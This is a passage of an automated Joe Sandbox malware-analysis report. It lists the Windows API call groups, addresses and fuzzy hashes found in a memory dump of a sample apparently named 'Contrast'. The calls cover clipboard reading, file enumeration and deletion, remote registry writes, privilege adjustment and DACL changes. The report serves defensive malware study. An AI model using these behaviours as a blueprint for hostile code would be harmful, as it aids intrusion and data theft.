                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                        • Opcode ID: d2230e083729568c0e130014ee901f03264494c4e64028ff80953563b9d11663
                                                                                                                                        • Instruction ID: 39e1093056ad299290247ecb5920aa9dcfe43d2d51f39be399ebb42912dfed4f
                                                                                                                                        • Opcode Fuzzy Hash: d2230e083729568c0e130014ee901f03264494c4e64028ff80953563b9d11663
                                                                                                                                        • Instruction Fuzzy Hash: 748136B190020ABFDF119FA4DD49AEEBF79BF45314F144119F910A72A1DB328A19EB60
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(005A0980), ref: 0058465C
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0058466A
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00584672
                                                                                                                                        • CloseClipboard.USER32 ref: 0058467E
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0058469A
                                                                                                                                        • CloseClipboard.USER32 ref: 005846A4
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 005846B9
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 005846C6
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 005846CE
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 005846DB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0058470F
                                                                                                                                        • CloseClipboard.USER32 ref: 0058481F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                        • Opcode ID: bcb20be6d01bcad624bf887758bfac3072ccf64d76d886ba3e78ed25c6dd180d
                                                                                                                                        • Instruction ID: 919fa1ea7075c44278b01d112d12e59ffaa5374a46c6e42b25040fb5f9a218ff
                                                                                                                                        • Opcode Fuzzy Hash: bcb20be6d01bcad624bf887758bfac3072ccf64d76d886ba3e78ed25c6dd180d
                                                                                                                                        • Instruction Fuzzy Hash: 5B518035244202ABD700FF60EC49F6E7BA8BFA6B51F000529F946E31D1EB7099099F66
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0057F5F9
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F60E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F625
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0057F637
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0057F651
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0057F669
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F674
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F690
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F6B7
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F6CE
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F6E0
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(005CB578), ref: 0057F6FE
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F708
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F715
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F727
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                        • String ID: *.*$SW
                                                                                                                                        • API String ID: 1803514871-1897071871
                                                                                                                                        • Opcode ID: 222ac034ca68467f28074063ed468bd42445c6b9751ed7416006fae1708b8684
                                                                                                                                        • Instruction ID: 4deaa6d075b7c40beab3f995b9033f32fbd32318c2900eed5b7abc1c08e236f7
                                                                                                                                        • Opcode Fuzzy Hash: 222ac034ca68467f28074063ed468bd42445c6b9751ed7416006fae1708b8684
                                                                                                                                        • Instruction Fuzzy Hash: 8E3193715512196EDB14DFB4EC8DAEE7BACFF59321F104165E809E21E0EB30DA48EB60
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057CDD0
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057CE24
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CE49
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057CE60
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057CE87
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CED3
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CF16
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CF6A
                                                                                                                                          • Part of subcall function 005338C8: __woutput_l.LIBCMT ref: 00533921
                                                                                                                                        • __swprintf.LIBCMT ref: 0057CFB8
                                                                                                                                          • Part of subcall function 005338C8: __flsbuf.LIBCMT ref: 00533943
                                                                                                                                          • Part of subcall function 005338C8: __flsbuf.LIBCMT ref: 0053395B
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D007
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D056
                                                                                                                                        • __swprintf.LIBCMT ref: 0057D0A5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                        • API String ID: 3953360268-2428617273
                                                                                                                                        • Opcode ID: a657358efce2dbc10c1391f88bf30a23a8809391bbdb969c352ba704a9d9135b
                                                                                                                                        • Instruction ID: 3686d6d60f7a5a255577fda6e4bdf0bbf50325e4fad5e52340e890ee512f2a93
                                                                                                                                        • Opcode Fuzzy Hash: a657358efce2dbc10c1391f88bf30a23a8809391bbdb969c352ba704a9d9135b
                                                                                                                                        • Instruction Fuzzy Hash: 4EA14DB1404306ABD710EBA4D989DAFBBECFFD5701F40491DF59582191EB30EA49CBA2
                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590FB3
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,005A0980,00000000,?,00000000,?,?), ref: 00591021
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00591069
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005910F2
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00591412
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059141F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                                        • Opcode ID: fd9883dac165e21618366a6d9a0d822cd84be101b37d400ee2ec1804b9887219
                                                                                                                                        • Instruction ID: 6531727f4fe1fe7f1bac2781612c35d2b34b07c0a1699174ccbd469e1fba95ff
                                                                                                                                        • Opcode Fuzzy Hash: fd9883dac165e21618366a6d9a0d822cd84be101b37d400ee2ec1804b9887219
                                                                                                                                        • Instruction Fuzzy Hash: 4B028E75200A129FDB14EF25D849E2ABBE5FF89710F04895CF84A9B3A1CB30ED41CB95
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0057F756
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F76B
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F782
                                                                                                                                          • Part of subcall function 00574875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00574890
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0057F7B1
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F7BC
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F7D8
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F7FF
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057F816
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F828
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(005CB578), ref: 0057F846
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F850
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F85D
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057F86F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*$jW
                                                                                                                                        • API String ID: 1824444939-3710049800
                                                                                                                                        • Opcode ID: 79393d629af56379cce4a0eafea3bcc2d5079c84f4eac39e67df18ac756d4ae1
                                                                                                                                        • Instruction ID: 8d90adb8e93718e9d7856db0e0bc1423188ce37bc327196ee3a3653c4da11f2c
                                                                                                                                        • Opcode Fuzzy Hash: 79393d629af56379cce4a0eafea3bcc2d5079c84f4eac39e67df18ac756d4ae1
                                                                                                                                        • Instruction Fuzzy Hash: 9831B57550021A6EDB14DFB4EC49AEE7FACFF59321F104165E808A31E1D730CE45AB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
                                                                                                                                          • Part of subcall function 00568E20: GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
                                                                                                                                          • Part of subcall function 00568E20: GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
                                                                                                                                          • Part of subcall function 00568E20: HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
                                                                                                                                          • Part of subcall function 00568EBD: GetProcessHeap.KERNEL32(00000008,00568916,00000000,00000000,?,00568916,?), ref: 00568EC9
                                                                                                                                          • Part of subcall function 00568EBD: HeapAlloc.KERNEL32(00000000,?,00568916,?), ref: 00568ED0
                                                                                                                                          • Part of subcall function 00568EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00568916,?), ref: 00568EE1
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568931
                                                                                                                                        • _memset.LIBCMT ref: 00568946
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568965
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00568976
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 005689B3
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005689CF
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 005689EC
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005689FB
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00568A02
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568A23
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00568A2A
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568A5B
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568A81
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568A95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3996160137-0
                                                                                                                                        • Opcode ID: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                                                                                                                                        • Instruction ID: 47fbb05b22554f740c06e6980e112fc3d8f524c60c24c83264f63f4fc109150d
                                                                                                                                        • Opcode Fuzzy Hash: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                                                                                                                                        • Instruction Fuzzy Hash: C961577590020ABFDF00DFA1DC49AFEBB79FF44310F04826AE915A7290DB319A04DB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590B0C
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00590BAB
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00590C43
                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590E82
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00590E8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1240663315-0
                                                                                                                                        • Opcode ID: ddf351ad794a99d9511c86f81d56f9f7a147492d3f5608112a63e2e2a457940e
                                                                                                                                        • Instruction ID: 2f8467c3a8051320592cd96948c24fc0cfbe773e6c2fdb29e0d8f2aab6fd1618
                                                                                                                                        • Opcode Fuzzy Hash: ddf351ad794a99d9511c86f81d56f9f7a147492d3f5608112a63e2e2a457940e
                                                                                                                                        • Instruction Fuzzy Hash: 85E16A71204211AFCB14DF28C895E2BBBE9FF89714F04996DF84ADB2A1DA30ED45CB51
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 00574451
                                                                                                                                        • __swprintf.LIBCMT ref: 0057445E
                                                                                                                                          • Part of subcall function 005338C8: __woutput_l.LIBCMT ref: 00533921
                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00574488
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00574494
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 005744A1
                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 005744C1
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 005744D3
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 005744E2
                                                                                                                                        • LockResource.KERNEL32(?), ref: 005744EE
                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0057454F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                        • Opcode ID: 3d065c12931802dc6946354b026fb42a5aa260ca2d58d8f2b15b09e6670af4b7
                                                                                                                                        • Instruction ID: 9f85fa473863589f15de78578ed6d104e8ab38fbb3a45bea2e558d66f601366e
                                                                                                                                        • Opcode Fuzzy Hash: 3d065c12931802dc6946354b026fb42a5aa260ca2d58d8f2b15b09e6670af4b7
                                                                                                                                        • Instruction Fuzzy Hash: 66318D7150121AAFDB119FA0FC48ABB7FA9FF05301F008826F91AD2190E730DA10EBA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: e7153ee9f9660612a9f9d87a5151dbd8eaa0a3c6d12dd74cc0ae979ec7110fed
                                                                                                                                        • Instruction ID: 317932cad45bff82a674baef877ec98cb1b3b9673109c3b8c3c9bbbf0205240a
                                                                                                                                        • Opcode Fuzzy Hash: e7153ee9f9660612a9f9d87a5151dbd8eaa0a3c6d12dd74cc0ae979ec7110fed
                                                                                                                                        • Instruction Fuzzy Hash: 5F218D352016129FEB11AF20EC09B6E7BA8FF95725F00841AFD069B2A1DB34AD419F94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                          • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00573D96
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00573E3E
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00573E51
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00573E6E
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573E90
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00573EAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 4002782344-1173974218
                                                                                                                                        • Opcode ID: fd73370eab77b991cca6042bc91b6001ad3d728026553a297eeedfc9313b5921
                                                                                                                                        • Instruction ID: 238407e7471a56dae57afa1912f1ee6710c7035860d055420a97b2b36dec2973
                                                                                                                                        • Opcode Fuzzy Hash: fd73370eab77b991cca6042bc91b6001ad3d728026553a297eeedfc9313b5921
                                                                                                                                        • Instruction Fuzzy Hash: 8251943580015E9ACF15EBA0EA569EEBB79BF61310F204165F846B31D1EB315F0DEB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057FA83
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057FB96
                                                                                                                                          • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0057FAB3
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057FAC7
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057FAE2
                                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0057FB80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
